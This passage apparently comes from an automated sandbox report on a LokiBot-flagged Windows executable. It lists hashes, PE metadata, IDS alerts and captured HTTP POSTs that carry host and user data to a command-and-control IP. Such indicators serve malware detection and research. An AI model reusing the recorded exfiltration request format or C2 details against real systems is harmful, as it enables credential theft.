                                                Specifications_Details_350_RFQ.exeGet hashmaliciousBrowse
                                                • 162.55.60.2
                                                TODlhXahaM.exeGet hashmaliciousBrowse
                                                • 162.0.217.254
                                                Z9ZA9jZ3cu.exeGet hashmaliciousBrowse
                                                • 162.0.217.254
                                                2YdO8irbxA.exeGet hashmaliciousBrowse
                                                • 162.0.217.254
                                                IydVfmXqWP.exeGet hashmaliciousBrowse
                                                • 162.0.217.254
                                                8JIQ79M31F.exeGet hashmaliciousBrowse
                                                • 162.0.217.254
                                                SecuriteInfo.com.Win32.PWSX-gen.9464.exeGet hashmaliciousBrowse
                                                • 162.0.223.13
                                                mwb0yr35Qj.elfGet hashmaliciousBrowse
                                                • 162.16.176.108
                                                HtQvXioDrB.exeGet hashmaliciousBrowse
                                                • 162.0.217.254
                                                Product Inquiry.exeGet hashmaliciousBrowse
                                                • 162.0.223.13
                                                1.PARTICULARS.I.exeGet hashmaliciousBrowse
                                                • 162.0.216.69

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI#53034601506400.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\PI#53034601506400.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1394
                                                Entropy (8bit):5.340883346054895
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4bE4KnKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84F0:MIHK5HKXE1qHbHKnYHKhQnoPtHoxHhAR
                                                MD5:B51A52A837298BCF7A6EB58551AEF99C
                                                SHA1:61EEFCC20AC255B8651769E5C48E27B2A983FC4A
                                                SHA-256:1D393FBB3CE754EA699462C2778587A7F2451EB23BE2BD5084C95A46B20BE8AF
                                                SHA-512:138544399787651C847837719606197E539857206CCB271E0F4A86E2017FBADABADF5A235B6F6F1DA8ADE7EF29DBA3115CD1996AD01F92CA30C57D0BF217C11C
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e08

                                                C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

                                                Download File
                                                Process:C:\Users\user\Desktop\PI#53034601506400.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:1

                                                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a

                                                Download File
                                                Process:C:\Users\user\Desktop\PI#53034601506400.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):47
                                                Entropy (8bit):1.168829563685559
                                                Encrypted:false
                                                SSDEEP:3:/lSll2DQi:AoMi
                                                MD5:DAB633BEBCCE13575989DCFA4E2203D6
                                                SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                                                SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                                                SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:........................................user.

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):6.864314970810788
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:PI#53034601506400.exe
                                                File size:864768
                                                MD5:05d1649e1b980b3d59b189a2fe07fc3c
                                                SHA1:9227eb122ce621fa3f7375c4a0ac4becd45b82c0
                                                SHA256:66f1a748e30aaa66b2053848270d68f5dc3ec9ccd4b9a5dbaa6a6dfd3139490c
                                                SHA512:416a319477478c75af755e598451a7a71753ff6d956f327fe08d5d207f455e5e4f1717a008af6eb441a1d083c47b1f185576ee8bcff860162553ce237253a5d2
                                                SSDEEP:24576:8hLuyygLvA4Bk+3F4LneWDL23YmEJxvNT:oLuyygLvA4i+36SA2IZ/V
                                                TLSH:8405D0371AEA4B0BD12873B491E1C6F593B99D12E066C3876FC57C9FB0677208B21762
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Kt...............0..*...........I... ...`....@.. ....................................@................................

                                                File Icon

                                                Icon Hash:00828e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x4d49fa
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x92744BED [Mon Nov 11 14:25:49 2047 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xd49a80x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xd60000x3e8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xd80000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xd498c0x1c.text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xd2a000xd2a00False0.7079770956973294data6.8711614725083345IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0xd60000x3e80x400False0.408203125data3.1405939185942064IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xd80000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_VERSION0xd60580x38cPGP symmetric key encrypted data - Plaintext or unencrypted data

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                192.168.2.5162.0.223.1349699802024317 09/23/22-07:58:29.454711TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24969980192.168.2.5162.0.223.13
                                                192.168.2.5162.0.223.1349701802024313 09/23/22-07:58:37.371596TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970180192.168.2.5162.0.223.13
                                                192.168.2.5162.0.223.1349701802021641 09/23/22-07:58:37.371596TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970180192.168.2.5162.0.223.13
                                                192.168.2.5162.0.223.1349699802021641 09/23/22-07:58:29.454711TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969980192.168.2.5162.0.223.13
                                                192.168.2.5162.0.223.1349699802024312 09/23/22-07:58:29.454711TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14969980192.168.2.5162.0.223.13
                                                192.168.2.5162.0.223.1349701802024318 09/23/22-07:58:37.371596TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970180192.168.2.5162.0.223.13
                                                192.168.2.5162.0.223.1349700802024312 09/23/22-07:58:35.112918TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970080192.168.2.5162.0.223.13
                                                192.168.2.5162.0.223.1349700802021641 09/23/22-07:58:35.112918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970080192.168.2.5162.0.223.13
                                                192.168.2.5162.0.223.1349700802024317 09/23/22-07:58:35.112918TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970080192.168.2.5162.0.223.13

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 23, 2022 07:58:29.179511070 CEST4969980192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:29.359904051 CEST8049699162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:29.360583067 CEST4969980192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:29.454710960 CEST4969980192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:29.634676933 CEST8049699162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:29.635971069 CEST4969980192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:29.816203117 CEST8049699162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:30.407465935 CEST8049699162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:30.407499075 CEST8049699162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:30.407515049 CEST8049699162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:30.407531977 CEST8049699162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:30.407542944 CEST8049699162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:30.407654047 CEST4969980192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:30.407746077 CEST4969980192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:30.413930893 CEST4969980192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:34.932647943 CEST4970080192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:35.109270096 CEST8049700162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:35.109378099 CEST4970080192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:35.112917900 CEST4970080192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:35.289486885 CEST8049700162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:35.289758921 CEST4970080192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:35.466195107 CEST8049700162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:36.030708075 CEST8049700162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:36.030744076 CEST8049700162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:36.030761003 CEST8049700162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:36.030777931 CEST8049700162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:36.030790091 CEST8049700162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:36.030867100 CEST4970080192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:36.030981064 CEST4970080192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:37.182208061 CEST4970180192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:37.359723091 CEST8049701162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:37.363136053 CEST4970180192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:37.371596098 CEST4970180192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:37.549609900 CEST8049701162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:37.549799919 CEST4970180192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:37.726494074 CEST8049701162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:38.275764942 CEST8049701162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:38.275799990 CEST8049701162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:38.275816917 CEST8049701162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:38.275834084 CEST8049701162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:38.275845051 CEST8049701162.0.223.13192.168.2.5
                                                Sep 23, 2022 07:58:38.275921106 CEST4970180192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:38.276007891 CEST4970180192.168.2.5162.0.223.13
                                                Sep 23, 2022 07:58:38.276607037 CEST4970180192.168.2.5162.0.223.13

                                                HTTP Request Dependency Graph

                                                • 162.0.223.13

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.549699162.0.223.1380C:\Users\user\Desktop\PI#53034601506400.exe
                                                TimestampkBytes transferredDirectionData
                                                Sep 23, 2022 07:58:29.454710960 CEST93OUTPOST /?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 162.0.223.13
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9AC780C0
                                                Content-Length: 192
                                                Connection: close
                                                Sep 23, 2022 07:58:29.635971069 CEST94OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                                                Data Ascii: 'ckav.rualfons965543DESKTOP-716T771k08F9C4E9C79A3B52B3F739430KDKvl
                                                Sep 23, 2022 07:58:30.407465935 CEST95INHTTP/1.1 200 OK
                                                Date: Fri, 23 Sep 2022 05:58:29 GMT
                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                X-Powered-By: PHP/5.4.16
                                                Content-Length: 5017
                                                Connection: close
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 48 54 54 50 20 53 65 72 76 65 72 20 54 65 73 74 20 50 61 67 65 20 70 6f 77 65 72 65 64 20 62 79 20 43 65 6e 74 4f 53 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 09 09 20 0d 0a 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 31 30 2c 20 32 34 2c 20 35 35 2c 20 31 29 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 7d 0d 0a 0d 0a 68 32 2c 20 68 33 2c 20 68 34 20 7b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0d 0a 7d 0d 0a 0d 0a 68 32 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 32 31 32 2c 32 31 32 2c 32 32 31 29 3b 20 2f 2a 20 4f 6c 64 20 62 72 6f 77 73 65 72 73 20 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 65 6c 6c 69 70 73 65 20 61 74 20 63 65 6e 74 65 72 20 74 6f 70 2c 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 31 29 20 30 25 2c 72 67 62 61 28 31 37 34 2c 31 37 34 2c 31 38 33 2c 31 29 20 31 30 30 25 29 3b 20 2f 2a 20 57 33 43 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 68 31 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 38 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 32 70 78 20 30 70 78 20 23 61 62 63 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Apache HTTP Server Test Page powered by CentOS</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap --> <link href="/noindex/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" /><style type="text/css">... body { font-family: "Open Sans", Helvetica, sans-serif; font-weight: 100; color: #ccc; background: rgba(10, 24, 55, 1); font-size: 16px;}h2, h3, h4 { font-weight: 200;}h2 { font-size: 28px;}.jumbotron { margin-bottom: 0; color: #333; background: rgb(212,212,221); /* Old browsers */ background: radial-gradient(ellipse at center top, rgba(255,255,255,1) 0%,rgba(174,174,183,1) 100%); /* W3C */}.jumbotron h1 { font-size: 128px; font-weight: 700; color: white; text-shadow: 0px 2px 0px #abc,
                                                Sep 23, 2022 07:58:30.407499075 CEST96INData Raw: 20 20 20 20 30 70 78 20 34 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 70 78 20 35 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 29 2c 0d 0a 20
                                                Data Ascii: 0px 4px 10px rgba(0,0,0,0.15), 0px 5px 2px rgba(0,0,0,0.1), 0px 6px 30px rgba(0,0,0,0.1);}.jumbotron p { font-size: 28px; font-weight: 100;}.main { background: white; color: #234;
                                                Sep 23, 2022 07:58:30.407515049 CEST98INData Raw: 6d 65 20 22 77 65 62 6d 61 73 74 65 72 22 20 61 6e 64 20 64 69 72 65 63 74 65 64 20 74 6f 20 74 68 65 20 77 65 62 73 69 74 65 27 73 20 64 6f 6d 61 69 6e 20 73 68 6f 75 6c 64 20 72 65 61 63 68 20 74 68 65 20 61 70 70 72 6f 70 72 69 61 74 65 20 70
                                                Data Ascii: me "webmaster" and directed to the website's domain should reach the appropriate person.</p> <p>For example, if you experienced problems while visiting www.example.com, you should send e-mail to "webmaster@example.com".</p> </di
                                                Sep 23, 2022 07:58:30.407531977 CEST99INData Raw: 61 72 65 20 74 68 61 74 20 6d 61 6b 65 73 20 74 68 65 20 77 65 62 73 69 74 65 20 72 75 6e 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 49 66 20 79 6f 75 20 68 61 76 65 20 69 73 73 75
                                                Data Ascii: are that makes the website run.</p> <p>If you have issues with the content of this site, contact the owner of the domain, not the CentOS project. Unless you intended to visit CentOS.org, the CentOS Proj


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.549700162.0.223.1380C:\Users\user\Desktop\PI#53034601506400.exe
                                                TimestampkBytes transferredDirectionData
                                                Sep 23, 2022 07:58:35.112917900 CEST100OUTPOST /?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 162.0.223.13
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9AC780C0
                                                Content-Length: 192
                                                Connection: close
                                                Sep 23, 2022 07:58:35.289758921 CEST100OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                                                Data Ascii: 'ckav.rualfons965543DESKTOP-716T771+08F9C4E9C79A3B52B3F739430bRUEv
                                                Sep 23, 2022 07:58:36.030708075 CEST102INHTTP/1.1 200 OK
                                                Date: Fri, 23 Sep 2022 05:58:35 GMT
                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                X-Powered-By: PHP/5.4.16
                                                Content-Length: 5017
                                                Connection: close
                                                Content-Type: text/html; charset=UTF-8
